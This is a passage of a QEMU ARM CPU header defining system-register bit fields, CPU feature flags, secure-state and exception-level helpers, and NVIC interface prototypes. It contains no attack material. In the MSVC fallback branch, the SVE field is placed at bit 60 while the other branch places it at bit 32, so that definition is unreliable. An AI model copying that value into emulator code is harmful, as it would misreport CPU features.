cpu->ccsidr[]; * define a mask for this and check that it doesn't permit running off * the end of the array. */ FIELD(V7M_CSSELR, INDEX, 0, 4) /* v7M FPCCR bits */ FIELD(V7M_FPCCR, LSPACT, 0, 1) FIELD(V7M_FPCCR, USER, 1, 1) FIELD(V7M_FPCCR, S, 2, 1) FIELD(V7M_FPCCR, THREAD, 3, 1) FIELD(V7M_FPCCR, HFRDY, 4, 1) FIELD(V7M_FPCCR, MMRDY, 5, 1) FIELD(V7M_FPCCR, BFRDY, 6, 1) FIELD(V7M_FPCCR, SFRDY, 7, 1) FIELD(V7M_FPCCR, MONRDY, 8, 1) FIELD(V7M_FPCCR, SPLIMVIOL, 9, 1) FIELD(V7M_FPCCR, UFRDY, 10, 1) FIELD(V7M_FPCCR, RES0, 11, 15) FIELD(V7M_FPCCR, TS, 26, 1) FIELD(V7M_FPCCR, CLRONRETS, 27, 1) FIELD(V7M_FPCCR, CLRONRET, 28, 1) FIELD(V7M_FPCCR, LSPENS, 29, 1) FIELD(V7M_FPCCR, LSPEN, 30, 1) FIELD(V7M_FPCCR, ASPEN, 31, 1) /* These bits are banked. Others are non-banked and live in the M_REG_S bank */ #define R_V7M_FPCCR_BANKED_MASK \ (R_V7M_FPCCR_LSPACT_MASK | \ R_V7M_FPCCR_USER_MASK | \ R_V7M_FPCCR_THREAD_MASK | \ R_V7M_FPCCR_MMRDY_MASK | \ R_V7M_FPCCR_SPLIMVIOL_MASK | \ R_V7M_FPCCR_UFRDY_MASK | \ R_V7M_FPCCR_ASPEN_MASK) /* * System register ID fields. 
*/ FIELD(MIDR_EL1, REVISION, 0, 4) FIELD(MIDR_EL1, PARTNUM, 4, 12) FIELD(MIDR_EL1, ARCHITECTURE, 16, 4) FIELD(MIDR_EL1, VARIANT, 20, 4) FIELD(MIDR_EL1, IMPLEMENTER, 24, 8) FIELD(ID_ISAR0, SWAP, 0, 4) FIELD(ID_ISAR0, BITCOUNT, 4, 4) FIELD(ID_ISAR0, BITFIELD, 8, 4) FIELD(ID_ISAR0, CMPBRANCH, 12, 4) FIELD(ID_ISAR0, COPROC, 16, 4) FIELD(ID_ISAR0, DEBUG, 20, 4) FIELD(ID_ISAR0, DIVIDE, 24, 4) FIELD(ID_ISAR1, ENDIAN, 0, 4) FIELD(ID_ISAR1, EXCEPT, 4, 4) FIELD(ID_ISAR1, EXCEPT_AR, 8, 4) FIELD(ID_ISAR1, EXTEND, 12, 4) FIELD(ID_ISAR1, IFTHEN, 16, 4) FIELD(ID_ISAR1, IMMEDIATE, 20, 4) FIELD(ID_ISAR1, INTERWORK, 24, 4) FIELD(ID_ISAR1, JAZELLE, 28, 4) FIELD(ID_ISAR2, LOADSTORE, 0, 4) FIELD(ID_ISAR2, MEMHINT, 4, 4) FIELD(ID_ISAR2, MULTIACCESSINT, 8, 4) FIELD(ID_ISAR2, MULT, 12, 4) FIELD(ID_ISAR2, MULTS, 16, 4) FIELD(ID_ISAR2, MULTU, 20, 4) FIELD(ID_ISAR2, PSR_AR, 24, 4) FIELD(ID_ISAR2, REVERSAL, 28, 4) FIELD(ID_ISAR3, SATURATE, 0, 4) FIELD(ID_ISAR3, SIMD, 4, 4) FIELD(ID_ISAR3, SVC, 8, 4) FIELD(ID_ISAR3, SYNCHPRIM, 12, 4) FIELD(ID_ISAR3, TABBRANCH, 16, 4) FIELD(ID_ISAR3, T32COPY, 20, 4) FIELD(ID_ISAR3, TRUENOP, 24, 4) FIELD(ID_ISAR3, T32EE, 28, 4) FIELD(ID_ISAR4, UNPRIV, 0, 4) FIELD(ID_ISAR4, WITHSHIFTS, 4, 4) FIELD(ID_ISAR4, WRITEBACK, 8, 4) FIELD(ID_ISAR4, SMC, 12, 4) FIELD(ID_ISAR4, BARRIER, 16, 4) FIELD(ID_ISAR4, SYNCHPRIM_FRAC, 20, 4) FIELD(ID_ISAR4, PSR_M, 24, 4) FIELD(ID_ISAR4, SWP_FRAC, 28, 4) FIELD(ID_ISAR5, SEVL, 0, 4) FIELD(ID_ISAR5, AES, 4, 4) FIELD(ID_ISAR5, SHA1, 8, 4) FIELD(ID_ISAR5, SHA2, 12, 4) FIELD(ID_ISAR5, CRC32, 16, 4) FIELD(ID_ISAR5, RDM, 24, 4) FIELD(ID_ISAR5, VCMA, 28, 4) FIELD(ID_ISAR6, JSCVT, 0, 4) FIELD(ID_ISAR6, DP, 4, 4) FIELD(ID_ISAR6, FHM, 8, 4) FIELD(ID_ISAR6, SB, 12, 4) FIELD(ID_ISAR6, SPECRES, 16, 4) FIELD(ID_MMFR3, CMAINTVA, 0, 4) FIELD(ID_MMFR3, CMAINTSW, 4, 4) FIELD(ID_MMFR3, BPMAINT, 8, 4) FIELD(ID_MMFR3, MAINTBCST, 12, 4) FIELD(ID_MMFR3, PAN, 16, 4) FIELD(ID_MMFR3, COHWALK, 20, 4) FIELD(ID_MMFR3, CMEMSZ, 24, 4) FIELD(ID_MMFR3, SUPERSEC, 28, 4) FIELD(ID_MMFR4, SPECSEI, 0, 4) FIELD(ID_MMFR4, AC2, 4, 4) FIELD(ID_MMFR4, XNX, 8, 4) FIELD(ID_MMFR4, CNP, 12, 4) FIELD(ID_MMFR4, HPDS, 16, 4) FIELD(ID_MMFR4, LSM, 20, 4) FIELD(ID_MMFR4, CCIDX, 24, 4) FIELD(ID_MMFR4, EVT, 28, 4) FIELD(ID_AA64ISAR0, AES, 4, 4) FIELD(ID_AA64ISAR0, SHA1, 8, 4) FIELD(ID_AA64ISAR0, SHA2, 12, 4) FIELD(ID_AA64ISAR0, CRC32, 16, 4) FIELD(ID_AA64ISAR0, ATOMIC, 20, 4) FIELD(ID_AA64ISAR0, RDM, 28, 4) #ifdef _MSC_VER /* warning C4309: 'initializing': truncation of constant value. enum is 32bit in MSVC. 
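 *
 * The #define fallbacks below must match what FIELD() would generate with a
 * 64-bit-clean compiler; as a quick illustrative check (not compiled):
 */
#if 0 /* MAKE_64BIT_MASK(shift, length) sets 'length' bits starting at bit
       * 'shift', so the SHA3 field at bits [35:32] masks to 0xf00000000. */
QEMU_BUILD_BUG_ON(MAKE_64BIT_MASK(32, 4) != 0xf00000000ULL);
#endif
/*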
*/ #define R_ID_AA64ISAR0_SHA3_SHIFT 32 #define R_ID_AA64ISAR0_SHA3_LENGTH 4 #define R_ID_AA64ISAR0_SHA3_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR0_SHA3_SHIFT, R_ID_AA64ISAR0_SHA3_LENGTH) #define R_ID_AA64ISAR0_SM3_SHIFT 36 #define R_ID_AA64ISAR0_SM3_LENGTH 4 #define R_ID_AA64ISAR0_SM3_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR0_SM3_SHIFT, R_ID_AA64ISAR0_SM3_LENGTH) #define R_ID_AA64ISAR0_SM4_SHIFT 40 #define R_ID_AA64ISAR0_SM4_LENGTH 4 #define R_ID_AA64ISAR0_SM4_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR0_SM4_SHIFT, R_ID_AA64ISAR0_SM4_LENGTH) #define R_ID_AA64ISAR0_DP_SHIFT 44 #define R_ID_AA64ISAR0_DP_LENGTH 4 #define R_ID_AA64ISAR0_DP_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR0_DP_SHIFT, R_ID_AA64ISAR0_DP_LENGTH) #define R_ID_AA64ISAR0_FHM_SHIFT 48 #define R_ID_AA64ISAR0_FHM_LENGTH 4 #define R_ID_AA64ISAR0_FHM_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR0_FHM_SHIFT, R_ID_AA64ISAR0_FHM_LENGTH) #define R_ID_AA64ISAR0_TS_SHIFT 52 #define R_ID_AA64ISAR0_TS_LENGTH 4 #define R_ID_AA64ISAR0_TS_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR0_TS_SHIFT, R_ID_AA64ISAR0_TS_LENGTH) #define R_ID_AA64ISAR0_TLB_SHIFT 56 #define R_ID_AA64ISAR0_TLB_LENGTH 4 #define R_ID_AA64ISAR0_TLB_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR0_TLB_SHIFT, R_ID_AA64ISAR0_TLB_LENGTH) #define R_ID_AA64ISAR0_RNDR_SHIFT 60 #define R_ID_AA64ISAR0_RNDR_LENGTH 4 #define R_ID_AA64ISAR0_RNDR_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR0_RNDR_SHIFT, R_ID_AA64ISAR0_RNDR_LENGTH) #else FIELD(ID_AA64ISAR0, SHA3, 32, 4) FIELD(ID_AA64ISAR0, SM3, 36, 4) FIELD(ID_AA64ISAR0, SM4, 40, 4) FIELD(ID_AA64ISAR0, DP, 44, 4) FIELD(ID_AA64ISAR0, FHM, 48, 4) FIELD(ID_AA64ISAR0, TS, 52, 4) FIELD(ID_AA64ISAR0, TLB, 56, 4) FIELD(ID_AA64ISAR0, RNDR, 60, 4) #endif FIELD(ID_AA64ISAR1, DPB, 0, 4) FIELD(ID_AA64ISAR1, APA, 4, 4) FIELD(ID_AA64ISAR1, API, 8, 4) FIELD(ID_AA64ISAR1, JSCVT, 12, 4) FIELD(ID_AA64ISAR1, FCMA, 16, 4) FIELD(ID_AA64ISAR1, LRCPC, 20, 4) FIELD(ID_AA64ISAR1, GPA, 24, 4) FIELD(ID_AA64ISAR1, GPI, 28, 4) #ifdef _MSC_VER #define R_ID_AA64ISAR1_FRINTTS_SHIFT 32 #define R_ID_AA64ISAR1_FRINTTS_LENGTH 4 #define R_ID_AA64ISAR1_FRINTTS_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR1_FRINTTS_SHIFT, R_ID_AA64ISAR1_FRINTTS_LENGTH) #define R_ID_AA64ISAR1_SB_SHIFT 36 #define R_ID_AA64ISAR1_SB_LENGTH 4 #define R_ID_AA64ISAR1_SB_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR1_SB_SHIFT, R_ID_AA64ISAR1_SB_LENGTH) #define R_ID_AA64ISAR1_SPECRES_SHIFT 40 #define R_ID_AA64ISAR1_SPECRES_LENGTH 4 #define R_ID_AA64ISAR1_SPECRES_MASK MAKE_64BIT_MASK(R_ID_AA64ISAR1_SPECRES_SHIFT, R_ID_AA64ISAR1_SPECRES_LENGTH) #else FIELD(ID_AA64ISAR1, FRINTTS, 32, 4) FIELD(ID_AA64ISAR1, SB, 36, 4) FIELD(ID_AA64ISAR1, SPECRES, 40, 4) #endif FIELD(ID_AA64PFR0, EL0, 0, 4) FIELD(ID_AA64PFR0, EL1, 4, 4) FIELD(ID_AA64PFR0, EL2, 8, 4) FIELD(ID_AA64PFR0, EL3, 12, 4) FIELD(ID_AA64PFR0, FP, 16, 4) FIELD(ID_AA64PFR0, ADVSIMD, 20, 4) FIELD(ID_AA64PFR0, GIC, 24, 4) FIELD(ID_AA64PFR0, RAS, 28, 4) #ifdef _MSC_VER #define R_ID_AA64PFR0_SVE_SHIFT 60 #define R_ID_AA64PFR0_SVE_LENGTH 4 #define R_ID_AA64PFR0_SVE_MASK MAKE_64BIT_MASK(R_ID_AA64PFR0_SVE_SHIFT, R_ID_AA64PFR0_SVE_LENGTH) #else FIELD(ID_AA64PFR0, SVE, 32, 4) #endif FIELD(ID_AA64PFR1, BT, 0, 4) FIELD(ID_AA64PFR1, SBSS, 4, 4) FIELD(ID_AA64PFR1, MTE, 8, 4) FIELD(ID_AA64PFR1, RAS_FRAC, 12, 4) FIELD(ID_AA64MMFR0, PARANGE, 0, 4) FIELD(ID_AA64MMFR0, ASIDBITS, 4, 4) FIELD(ID_AA64MMFR0, BIGEND, 8, 4) FIELD(ID_AA64MMFR0, SNSMEM, 12, 4) FIELD(ID_AA64MMFR0, BIGENDEL0, 16, 4) FIELD(ID_AA64MMFR0, TGRAN16, 20, 4) FIELD(ID_AA64MMFR0, TGRAN64, 24, 4) FIELD(ID_AA64MMFR0, TGRAN4, 28, 4) #ifdef _MSC_VER #define R_ID_AA64MMFR0_TGRAN16_2_SHIFT 32 #define 
R_ID_AA64MMFR0_TGRAN16_2_LENGTH 4 #define R_ID_AA64MMFR0_TGRAN16_2_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR0_TGRAN16_2_SHIFT, R_ID_AA64MMFR0_TGRAN16_2_LENGTH) #define R_ID_AA64MMFR0_TGRAN64_2_SHIFT 36 #define R_ID_AA64MMFR0_TGRAN64_2_LENGTH 4 #define R_ID_AA64MMFR0_TGRAN64_2_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR0_TGRAN64_2_SHIFT, R_ID_AA64MMFR0_TGRAN64_2_LENGTH) #define R_ID_AA64MMFR0_TGRAN4_2_SHIFT 40 #define R_ID_AA64MMFR0_TGRAN4_2_LENGTH 4 #define R_ID_AA64MMFR0_TGRAN4_2_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR0_TGRAN4_2_SHIFT, R_ID_AA64MMFR0_TGRAN4_2_LENGTH) #define R_ID_AA64MMFR0_EXS_SHIFT 44 #define R_ID_AA64MMFR0_EXS_LENGTH 4 #define R_ID_AA64MMFR0_EXS_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR0_EXS_SHIFT, R_ID_AA64MMFR0_EXS_LENGTH) #else FIELD(ID_AA64MMFR0, TGRAN16_2, 32, 4) FIELD(ID_AA64MMFR0, TGRAN64_2, 36, 4) FIELD(ID_AA64MMFR0, TGRAN4_2, 40, 4) FIELD(ID_AA64MMFR0, EXS, 44, 4) #endif FIELD(ID_AA64MMFR1, HAFDBS, 0, 4) FIELD(ID_AA64MMFR1, VMIDBITS, 4, 4) FIELD(ID_AA64MMFR1, VH, 8, 4) FIELD(ID_AA64MMFR1, HPDS, 12, 4) FIELD(ID_AA64MMFR1, LO, 16, 4) FIELD(ID_AA64MMFR1, PAN, 20, 4) FIELD(ID_AA64MMFR1, SPECSEI, 24, 4) FIELD(ID_AA64MMFR1, XNX, 28, 4) FIELD(ID_AA64MMFR2, CNP, 0, 4) FIELD(ID_AA64MMFR2, UAO, 4, 4) FIELD(ID_AA64MMFR2, LSM, 8, 4) FIELD(ID_AA64MMFR2, IESB, 12, 4) FIELD(ID_AA64MMFR2, VARANGE, 16, 4) FIELD(ID_AA64MMFR2, CCIDX, 20, 4) FIELD(ID_AA64MMFR2, NV, 24, 4) FIELD(ID_AA64MMFR2, ST, 28, 4) #ifdef _MSC_VER #define R_ID_AA64MMFR2_AT_SHIFT 32 #define R_ID_AA64MMFR2_AT_LENGTH 4 #define R_ID_AA64MMFR2_AT_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR2_AT_SHIFT, R_ID_AA64MMFR2_AT_LENGTH) #define R_ID_AA64MMFR2_IDS_SHIFT 36 #define R_ID_AA64MMFR2_IDS_LENGTH 4 #define R_ID_AA64MMFR2_IDS_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR2_IDS_SHIFT, R_ID_AA64MMFR2_IDS_LENGTH) #define R_ID_AA64MMFR2_FWB_SHIFT 40 #define R_ID_AA64MMFR2_FWB_LENGTH 4 #define R_ID_AA64MMFR2_FWB_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR2_FWB_SHIFT, R_ID_AA64MMFR2_FWB_LENGTH) #define R_ID_AA64MMFR2_TTL_SHIFT 48 #define R_ID_AA64MMFR2_TTL_LENGTH 4 #define R_ID_AA64MMFR2_TTL_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR2_TTL_SHIFT, R_ID_AA64MMFR2_TTL_LENGTH) #define R_ID_AA64MMFR2_BBM_SHIFT 52 #define R_ID_AA64MMFR2_BBM_LENGTH 4 #define R_ID_AA64MMFR2_BBM_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR2_BBM_SHIFT, R_ID_AA64MMFR2_BBM_LENGTH) #define R_ID_AA64MMFR2_EVT_SHIFT 56 #define R_ID_AA64MMFR2_EVT_LENGTH 4 #define R_ID_AA64MMFR2_EVT_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR2_EVT_SHIFT, R_ID_AA64MMFR2_EVT_LENGTH) #define R_ID_AA64MMFR2_E0PD_SHIFT 60 #define R_ID_AA64MMFR2_E0PD_LENGTH 4 #define R_ID_AA64MMFR2_E0PD_MASK MAKE_64BIT_MASK(R_ID_AA64MMFR2_E0PD_SHIFT, R_ID_AA64MMFR2_E0PD_LENGTH) #else FIELD(ID_AA64MMFR2, AT, 32, 4) FIELD(ID_AA64MMFR2, IDS, 36, 4) FIELD(ID_AA64MMFR2, FWB, 40, 4) FIELD(ID_AA64MMFR2, TTL, 48, 4) FIELD(ID_AA64MMFR2, BBM, 52, 4) FIELD(ID_AA64MMFR2, EVT, 56, 4) FIELD(ID_AA64MMFR2, E0PD, 60, 4) #endif FIELD(ID_AA64DFR0, DEBUGVER, 0, 4) FIELD(ID_AA64DFR0, TRACEVER, 4, 4) FIELD(ID_AA64DFR0, PMUVER, 8, 4) FIELD(ID_AA64DFR0, BRPS, 12, 4) FIELD(ID_AA64DFR0, WRPS, 20, 4) FIELD(ID_AA64DFR0, CTX_CMPS, 28, 4) #ifdef _MSC_VER #define R_ID_AA64DFR0_PMSVER_SHIFT 32 #define R_ID_AA64DFR0_PMSVER_LENGTH 4 #define R_ID_AA64DFR0_PMSVER_MASK MAKE_64BIT_MASK(R_ID_AA64DFR0_PMSVER_SHIFT, R_ID_AA64DFR0_PMSVER_LENGTH) #define R_ID_AA64DFR0_DOUBLELOCK_SHIFT 36 #define R_ID_AA64DFR0_DOUBLELOCK_LENGTH 4 #define R_ID_AA64DFR0_DOUBLELOCK_MASK MAKE_64BIT_MASK(R_ID_AA64DFR0_DOUBLELOCK_SHIFT, R_ID_AA64DFR0_DOUBLELOCK_LENGTH) #define R_ID_AA64DFR0_TRACEFILT_SHIFT 40 #define 
R_ID_AA64DFR0_TRACEFILT_LENGTH 4 #define R_ID_AA64DFR0_TRACEFILT_MASK MAKE_64BIT_MASK(R_ID_AA64DFR0_TRACEFILT_SHIFT, R_ID_AA64DFR0_TRACEFILT_LENGTH) #else FIELD(ID_AA64DFR0, PMSVER, 32, 4) FIELD(ID_AA64DFR0, DOUBLELOCK, 36, 4) FIELD(ID_AA64DFR0, TRACEFILT, 40, 4) #endif FIELD(ID_DFR0, COPDBG, 0, 4) FIELD(ID_DFR0, COPSDBG, 4, 4) FIELD(ID_DFR0, MMAPDBG, 8, 4) FIELD(ID_DFR0, COPTRC, 12, 4) FIELD(ID_DFR0, MMAPTRC, 16, 4) FIELD(ID_DFR0, MPROFDBG, 20, 4) FIELD(ID_DFR0, PERFMON, 24, 4) FIELD(ID_DFR0, TRACEFILT, 28, 4) FIELD(DBGDIDR, SE_IMP, 12, 1) FIELD(DBGDIDR, NSUHD_IMP, 14, 1) FIELD(DBGDIDR, VERSION, 16, 4) FIELD(DBGDIDR, CTX_CMPS, 20, 4) FIELD(DBGDIDR, BRPS, 24, 4) FIELD(DBGDIDR, WRPS, 28, 4) FIELD(MVFR0, SIMDREG, 0, 4) FIELD(MVFR0, FPSP, 4, 4) FIELD(MVFR0, FPDP, 8, 4) FIELD(MVFR0, FPTRAP, 12, 4) FIELD(MVFR0, FPDIVIDE, 16, 4) FIELD(MVFR0, FPSQRT, 20, 4) FIELD(MVFR0, FPSHVEC, 24, 4) FIELD(MVFR0, FPROUND, 28, 4) FIELD(MVFR1, FPFTZ, 0, 4) FIELD(MVFR1, FPDNAN, 4, 4) FIELD(MVFR1, SIMDLS, 8, 4) FIELD(MVFR1, SIMDINT, 12, 4) FIELD(MVFR1, SIMDSP, 16, 4) FIELD(MVFR1, SIMDHP, 20, 4) FIELD(MVFR1, FPHP, 24, 4) FIELD(MVFR1, SIMDFMAC, 28, 4) FIELD(MVFR2, SIMDMISC, 0, 4) FIELD(MVFR2, FPMISC, 4, 4) QEMU_BUILD_BUG_ON(ARRAY_SIZE(((ARMCPU *)0)->ccsidr) <= R_V7M_CSSELR_INDEX_MASK); /* If adding a feature bit which corresponds to a Linux ELF * HWCAP bit, remember to update the feature-bit-to-hwcap * mapping in linux-user/elfload.c:get_elf_hwcap(). */ enum arm_features { ARM_FEATURE_AUXCR, /* ARM1026 Auxiliary control register. */ ARM_FEATURE_XSCALE, /* Intel XScale extensions. */ ARM_FEATURE_IWMMXT, /* Intel iwMMXt extension. */ ARM_FEATURE_V6, ARM_FEATURE_V6K, ARM_FEATURE_V7, ARM_FEATURE_THUMB2, ARM_FEATURE_PMSA, /* no MMU; may have Memory Protection Unit */ ARM_FEATURE_NEON, ARM_FEATURE_M, /* Microcontroller profile. */ ARM_FEATURE_OMAPCP, /* OMAP specific CP15 ops handling. */ ARM_FEATURE_THUMB2EE, ARM_FEATURE_V7MP, /* v7 Multiprocessing Extensions */ ARM_FEATURE_V7VE, /* v7 Virtualization Extensions (non-EL2 parts) */ ARM_FEATURE_V4T, ARM_FEATURE_V5, ARM_FEATURE_STRONGARM, ARM_FEATURE_VAPA, /* cp15 VA to PA lookups */ ARM_FEATURE_GENERIC_TIMER, ARM_FEATURE_MVFR, /* Media and VFP Feature Registers 0 and 1 */ ARM_FEATURE_DUMMY_C15_REGS, /* RAZ/WI all of cp15 crn=15 */ ARM_FEATURE_CACHE_TEST_CLEAN, /* 926/1026 style test-and-clean ops */ ARM_FEATURE_CACHE_DIRTY_REG, /* 1136/1176 cache dirty status register */ ARM_FEATURE_CACHE_BLOCK_OPS, /* v6 optional cache block operations */ ARM_FEATURE_MPIDR, /* has cp15 MPIDR */ ARM_FEATURE_PXN, /* has Privileged Execute Never bit */ ARM_FEATURE_LPAE, /* has Large Physical Address Extension */ ARM_FEATURE_V8, ARM_FEATURE_AARCH64, /* supports 64 bit mode */ ARM_FEATURE_CBAR, /* has cp15 CBAR */ ARM_FEATURE_CRC, /* ARMv8 CRC instructions */ ARM_FEATURE_CBAR_RO, /* has cp15 CBAR and it is read-only */ ARM_FEATURE_EL2, /* has EL2 Virtualization support */ ARM_FEATURE_EL3, /* has EL3 Secure monitor support */ ARM_FEATURE_THUMB_DSP, /* DSP insns supported in the Thumb encodings */ ARM_FEATURE_PMU, /* has PMU support */ ARM_FEATURE_VBAR, /* has cp15 VBAR */ ARM_FEATURE_M_SECURITY, /* M profile Security Extension */ ARM_FEATURE_M_MAIN, /* M profile Main Extension */ }; static inline int arm_feature(CPUARMState *env, int feature) { return (env->features & (1ULL << feature)) != 0; } /* Return true if exception levels below EL3 are in secure state, * or would be following an exception return to that level. 
* Unlike arm_is_secure() (which is always a question about the * _current_ state of the CPU) this doesn't care about the current * EL or mode. */ static inline bool arm_is_secure_below_el3(CPUARMState *env) { if (arm_feature(env, ARM_FEATURE_EL3)) { return !(env->cp15.scr_el3 & SCR_NS); } else { /* If EL3 is not supported then the secure state is implementation * defined, in which case QEMU defaults to non-secure. */ return false; } } /* Return true if the CPU is AArch64 EL3 or AArch32 Mon */ static inline bool arm_is_el3_or_mon(CPUARMState *env) { if (arm_feature(env, ARM_FEATURE_EL3)) { if (is_a64(env) && extract32(env->pstate, 2, 2) == 3) { /* CPU currently in AArch64 state and EL3 */ return true; } else if (!is_a64(env) && (env->uncached_cpsr & CPSR_M) == ARM_CPU_MODE_MON) { /* CPU currently in AArch32 state and monitor mode */ return true; } } return false; } /* Return true if the processor is in secure state */ static inline bool arm_is_secure(CPUARMState *env) { if (arm_is_el3_or_mon(env)) { return true; } return arm_is_secure_below_el3(env); } /** * arm_hcr_el2_eff(): Return the effective value of HCR_EL2. * E.g. when in secure state, fields in HCR_EL2 are suppressed, * "for all purposes other than a direct read or write access of HCR_EL2." * Not included here is HCR_RW. */ uint64_t arm_hcr_el2_eff(CPUARMState *env); /* Return true if the specified exception level is running in AArch64 state. */ static inline bool arm_el_is_aa64(CPUARMState *env, int el) { /* This isn't valid for EL0 (if we're in EL0, is_a64() is what you want, * and if we're not in EL0 then the state of EL0 isn't well defined.) */ assert(el >= 1 && el <= 3); bool aa64 = arm_feature(env, ARM_FEATURE_AARCH64); /* The highest exception level is always at the maximum supported * register width, and then lower levels have a register width controlled * by bits in the SCR or HCR registers. */ if (el == 3) { return aa64; } if (arm_feature(env, ARM_FEATURE_EL3)) { aa64 = aa64 && (env->cp15.scr_el3 & SCR_RW); } if (el == 2) { return aa64; } if (arm_feature(env, ARM_FEATURE_EL2) && !arm_is_secure_below_el3(env)) { aa64 = aa64 && (env->cp15.hcr_el2 & HCR_RW); } return aa64; } /* Function for determining whether guest cp register reads and writes should * access the secure or non-secure bank of a cp register. When EL3 is * operating in AArch32 state, the NS-bit determines whether the secure * instance of a cp register should be used. When EL3 is AArch64 (or if * it doesn't exist at all) then there is no register banking, and all * accesses are to the non-secure version. */ static inline bool access_secure_reg(CPUARMState *env) { bool ret = (arm_feature(env, ARM_FEATURE_EL3) && !arm_el_is_aa64(env, 3) && !(env->cp15.scr_el3 & SCR_NS)); return ret; } /* Macros for accessing a specified CP register bank */ #define A32_BANKED_REG_GET(_env, _regname, _secure) \ ((_secure) ? (_env)->cp15._regname##_s : (_env)->cp15._regname##_ns) #define A32_BANKED_REG_SET(_env, _regname, _secure, _val) \ do { \ if (_secure) { \ (_env)->cp15._regname##_s = (_val); \ } else { \ (_env)->cp15._regname##_ns = (_val); \ } \ } while (0) /* Macros for automatically accessing a specific CP register bank depending on * the current secure state of the system. These macros are not intended for * supporting instruction translation reads/writes as these are dependent * solely on the SCR.NS bit and not the mode.
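 *
 * For illustration (hypothetical field name; not part of this header),
 * explicitly selecting a bank of a banked cp15 register "dacr":
 */
#if 0 /* Not compiled. */
static inline void banked_reg_demo(CPUARMState *env)
{
    uint64_t d = A32_BANKED_REG_GET(env, dacr, true); /* secure bank */
    A32_BANKED_REG_SET(env, dacr, false, d);          /* non-secure bank */
}
#endif
/*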
*/ #define A32_BANKED_CURRENT_REG_GET(_env, _regname) \ A32_BANKED_REG_GET((_env), _regname, \ (arm_is_secure(_env) && !arm_el_is_aa64((_env), 3))) #define A32_BANKED_CURRENT_REG_SET(_env, _regname, _val) \ A32_BANKED_REG_SET((_env), _regname, \ (arm_is_secure(_env) && !arm_el_is_aa64((_env), 3)), \ (_val)) void arm_cpu_list(void); uint32_t arm_phys_excp_target_el(CPUState *cs, uint32_t excp_idx, uint32_t cur_el, bool secure); /* Interface between CPU and Interrupt controller. */ bool armv7m_nvic_can_take_pending_exception(void *opaque); /** * armv7m_nvic_set_pending: mark the specified exception as pending * @opaque: the NVIC * @irq: the exception number to mark pending * @secure: false for non-banked exceptions or for the nonsecure * version of a banked exception, true for the secure version of a banked * exception. * * Marks the specified exception as pending. Note that we will assert() * if @secure is true and @irq does not specify one of the fixed set * of architecturally banked exceptions. */ void armv7m_nvic_set_pending(void *opaque, int irq, bool secure); /** * armv7m_nvic_set_pending_derived: mark this derived exception as pending * @opaque: the NVIC * @irq: the exception number to mark pending * @secure: false for non-banked exceptions or for the nonsecure * version of a banked exception, true for the secure version of a banked * exception. * * Similar to armv7m_nvic_set_pending(), but specifically for derived * exceptions (exceptions generated in the course of trying to take * a different exception). */ void armv7m_nvic_set_pending_derived(void *opaque, int irq, bool secure); /** * armv7m_nvic_set_pending_lazyfp: mark this lazy FP exception as pending * @opaque: the NVIC * @irq: the exception number to mark pending * @secure: false for non-banked exceptions or for the nonsecure * version of a banked exception, true for the secure version of a banked * exception. * * Similar to armv7m_nvic_set_pending(), but specifically for exceptions * generated in the course of lazy stacking of FP registers. */ void armv7m_nvic_set_pending_lazyfp(void *opaque, int irq, bool secure); /** * armv7m_nvic_get_pending_irq_info: return highest priority pending * exception, and whether it targets Secure state * @opaque: the NVIC * @pirq: set to pending exception number * @ptargets_secure: set to whether pending exception targets Secure * * This function writes the number of the highest priority pending * exception (the one which would be made active by * armv7m_nvic_acknowledge_irq()) to @pirq, and sets @ptargets_secure * to true if the current highest priority pending exception should * be taken to Secure state, false for NS. */ void armv7m_nvic_get_pending_irq_info(void *opaque, int *pirq, bool *ptargets_secure); /** * armv7m_nvic_acknowledge_irq: make highest priority pending exception active * @opaque: the NVIC * * Move the current highest priority pending exception from the pending * state to the active state, and update v7m.exception to indicate that * it is the exception currently being handled. */ void armv7m_nvic_acknowledge_irq(void *opaque); /** * armv7m_nvic_complete_irq: complete specified interrupt or exception * @opaque: the NVIC * @irq: the exception number to complete * @secure: true if this exception was secure * * Returns: -1 if the irq was not active * 1 if completing this irq brought us back to base (no active irqs) * 0 if there is still an irq active after this one was completed * (Ignoring -1, this is the same as the RETTOBASE value before completion.) 
*/ int armv7m_nvic_complete_irq(void *opaque, int irq, bool secure); /** * armv7m_nvic_get_ready_status(void *opaque, int irq, bool secure) * @opaque: the NVIC * @irq: the exception number to mark pending * @secure: false for non-banked exceptions or for the nonsecure * version of a banked exception, true for the secure version of a banked * exception. * * Return whether an exception is "ready", i.e. whether the exception is * enabled and is configured at a priority which would allow it to * interrupt the current execution priority. This controls whether the * RDY bit for it in the FPCCR is set. */ bool armv7m_nvic_get_ready_status(void *opaque, int irq, bool secure); /** * armv7m_nvic_raw_execution_priority: return the raw execution priority * @opaque: the NVIC * * Returns: the raw execution priority as defined by the v8M architecture. * This is the execution priority minus the effects of AIRCR.PRIS, * and minus any PRIMASK/FAULTMASK/BASEPRI priority boosting. * (v8M ARM ARM I_PKLD.) */ int armv7m_nvic_raw_execution_priority(void *opaque); /** * armv7m_nvic_neg_prio_requested: return true if the requested execution * priority is negative for the specified security state. * @opaque: the NVIC * @secure: the security state to test * This corresponds to the pseudocode IsReqExecPriNeg(). */ bool armv7m_nvic_neg_prio_requested(void *opaque, bool secure); /* Interface for defining coprocessor registers. * Registers are defined in tables of arm_cp_reginfo structs * which are passed to define_arm_cp_regs(). */ /* When looking up a coprocessor register we look for it * via an integer which encodes all of: * coprocessor number * Crn, Crm, opc1, opc2 fields * 32 or 64 bit register (ie is it accessed via MRC/MCR * or via MRRC/MCRR?) * non-secure/secure bank (AArch32 